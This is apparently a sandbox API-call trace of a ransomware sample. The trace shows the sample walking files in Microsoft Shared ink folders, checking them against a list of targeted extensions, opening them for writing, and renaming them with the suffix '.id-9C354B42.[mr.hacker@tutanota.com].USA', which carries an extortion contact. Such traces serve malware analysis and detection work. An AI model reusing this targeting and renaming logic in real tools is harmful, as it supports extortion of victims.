[0035.498] lstrlenW (lpString=".ppt") returned 4 [0035.498] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.498] lstrlenW (lpString=".zip") returned 4 [0035.498] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.498] lstrlenW (lpString=".rar") returned 4 [0035.498] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString=".bz2") returned 4 [0035.498] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString=".7z") returned 3 [0035.498] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.498] lstrlenW (lpString=".dbf") returned 4 [0035.498] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.498] lstrlenW (lpString=".1cd") returned 4 [0035.498] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0035.498] lstrlenW (lpString=".jpg") returned 4 [0035.498] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.499] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.499] lstrlenW (lpString="boxed-split.avi") returned 15 [0035.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.908] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=62976) returned 1 [0035.908] CloseHandle (hObject=0x17c) returned 1 [0035.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0035.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.908] lstrlenW (lpString=".doc") returned 4 [0035.908] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.908] lstrlenW (lpString=".docx") returned 5 [0035.908] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.908] lstrlenW (lpString=".pdf") returned 4 [0035.908] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.908] lstrlenW (lpString=".xls") returned 4 [0035.908] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".xlsx") returned 5 [0035.909] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.909] lstrlenW (lpString=".ppt") returned 4 [0035.909] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString=".zip") returned 4 [0035.909] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".rar") returned 4 [0035.909] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".bz2") returned 4 [0035.909] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".7z") returned 3 [0035.909] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString=".dbf") returned 4 [0035.909] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString=".1cd") returned 4 [0035.909] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString=".jpg") returned 4 [0035.909] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.909] lstrlenW (lpString=".doc") returned 4 [0035.909] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".docx") returned 5 [0035.909] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.909] lstrlenW (lpString=".pdf") returned 4 [0035.909] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.909] lstrlenW (lpString=".xls") returned 4 [0035.910] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString=".xlsx") returned 5 [0035.910] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.910] lstrlenW (lpString=".ppt") returned 4 [0035.910] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.910] lstrlenW (lpString=".zip") returned 4 [0035.910] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString=".rar") returned 4 [0035.910] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString=".bz2") returned 4 [0035.910] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString=".7z") returned 3 [0035.910] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.910] lstrlenW (lpString=".dbf") returned 4 [0035.910] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.910] lstrlenW (lpString=".1cd") returned 4 [0035.910] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0035.910] lstrlenW (lpString=".jpg") returned 4 [0035.911] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.911] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.911] lstrlenW (lpString="join.avi") returned 8 [0035.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.911] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=222208) returned 1 [0035.911] CloseHandle (hObject=0x17c) returned 1 [0035.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0035.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.911] lstrlenW (lpString=".doc") returned 4 [0035.911] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.911] lstrlenW (lpString=".docx") returned 5 [0035.912] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.912] lstrlenW (lpString=".pdf") returned 4 [0035.912] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString=".xls") returned 4 [0035.912] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString=".xlsx") returned 5 [0035.912] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.912] lstrlenW (lpString=".ppt") returned 4 [0035.912] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString=".zip") returned 4 [0035.912] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString=".rar") returned 4 [0035.912] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString=".bz2") returned 4 [0035.912] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString=".7z") returned 3 [0035.912] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString=".dbf") returned 4 [0035.912] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString=".1cd") returned 4 [0035.912] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString=".jpg") returned 4 [0035.912] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.912] lstrlenW (lpString=".doc") returned 4 [0035.912] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".docx") returned 5 [0035.913] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.913] lstrlenW (lpString=".pdf") returned 4 [0035.913] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".xls") returned 4 [0035.913] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".xlsx") returned 5 [0035.913] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.913] lstrlenW (lpString=".ppt") returned 4 [0035.913] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.913] lstrlenW (lpString=".zip") returned 4 [0035.913] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".rar") returned 4 [0035.913] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".bz2") returned 4 [0035.913] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString=".7z") returned 3 [0035.913] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.913] lstrlenW (lpString=".dbf") returned 4 [0035.913] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.913] lstrlenW (lpString=".1cd") returned 4 [0035.913] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0035.913] lstrlenW (lpString=".jpg") returned 4 [0035.913] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.913] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.914] lstrlenW (lpString="split.avi") returned 9 [0035.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.914] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=194048) returned 1 [0035.914] CloseHandle (hObject=0x17c) returned 1 [0035.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0035.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.914] lstrlenW (lpString=".doc") returned 4 [0035.914] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.914] lstrlenW (lpString=".docx") returned 5 [0035.914] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.914] lstrlenW (lpString=".pdf") returned 4 [0035.914] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.914] lstrlenW (lpString=".xls") returned 4 [0035.914] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.914] lstrlenW (lpString=".xlsx") returned 5 [0035.915] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.915] lstrlenW (lpString=".ppt") returned 4 [0035.915] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString=".zip") returned 4 [0035.915] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString=".rar") returned 4 [0035.915] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString=".bz2") returned 4 [0035.915] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString=".7z") returned 3 [0035.915] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString=".dbf") returned 4 [0035.915] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString=".1cd") returned 4 [0035.915] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString=".jpg") returned 4 [0035.915] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.915] lstrlenW (lpString=".doc") returned 4 [0035.915] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString=".docx") returned 5 [0035.915] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0035.915] lstrlenW (lpString=".pdf") returned 4 [0035.915] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.915] lstrlenW (lpString=".xls") returned 4 [0035.915] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString=".xlsx") returned 5 [0035.916] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0035.916] lstrlenW (lpString=".ppt") returned 4 [0035.916] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.916] lstrlenW (lpString=".zip") returned 4 [0035.916] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString=".rar") returned 4 [0035.916] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString=".bz2") returned 4 [0035.916] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString=".7z") returned 3 [0035.916] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.916] lstrlenW (lpString=".dbf") returned 4 [0035.916] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.916] lstrlenW (lpString=".1cd") returned 4 [0035.916] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0035.916] lstrlenW (lpString=".jpg") returned 4 [0035.916] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.916] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.916] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0035.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.917] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1600388) returned 1 [0035.917] CloseHandle (hObject=0x17c) returned 1 [0035.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0035.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.917] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0035.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.917] lstrlenW (lpString=".doc") returned 4 [0035.917] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.917] lstrlenW (lpString=".docx") returned 5 [0035.917] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.917] lstrlenW (lpString=".pdf") returned 4 [0035.917] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.917] lstrlenW (lpString=".xls") returned 4 [0035.917] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.917] lstrlenW (lpString=".xlsx") returned 5 [0035.918] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.918] lstrlenW (lpString=".ppt") returned 4 [0035.918] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString=".zip") returned 4 [0035.918] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".rar") returned 4 [0035.918] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".bz2") returned 4 [0035.918] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".7z") returned 3 [0035.918] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString=".dbf") returned 4 [0035.918] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString=".1cd") returned 4 [0035.918] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString=".jpg") returned 4 [0035.918] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.918] lstrlenW (lpString=".doc") returned 4 [0035.918] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".docx") returned 5 [0035.918] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0035.918] lstrlenW (lpString=".pdf") returned 4 [0035.918] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".xls") returned 4 [0035.918] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0035.918] lstrlenW (lpString=".xlsx") returned 5 [0035.919] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0035.919] lstrlenW (lpString=".ppt") returned 4 [0035.919] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0035.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.919] lstrlenW (lpString=".zip") returned 4 [0035.919] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0035.919] lstrlenW (lpString=".rar") returned 4 [0035.919] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0035.919] lstrlenW (lpString=".bz2") returned 4 [0035.919] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0035.919] lstrlenW (lpString=".7z") returned 3 [0035.919] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0035.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.919] lstrlenW (lpString=".dbf") returned 4 [0035.919] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0035.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.919] lstrlenW (lpString=".1cd") returned 4 [0035.919] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0035.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0035.919] lstrlenW (lpString=".jpg") returned 4 [0035.919] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0035.919] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.919] lstrlenW (lpString="auxbase.xml") returned 11 [0035.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.920] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1434) returned 1 [0035.920] CloseHandle (hObject=0x17c) returned 1 [0035.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0035.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0035.921] lstrlenW (lpString="C:\\Program 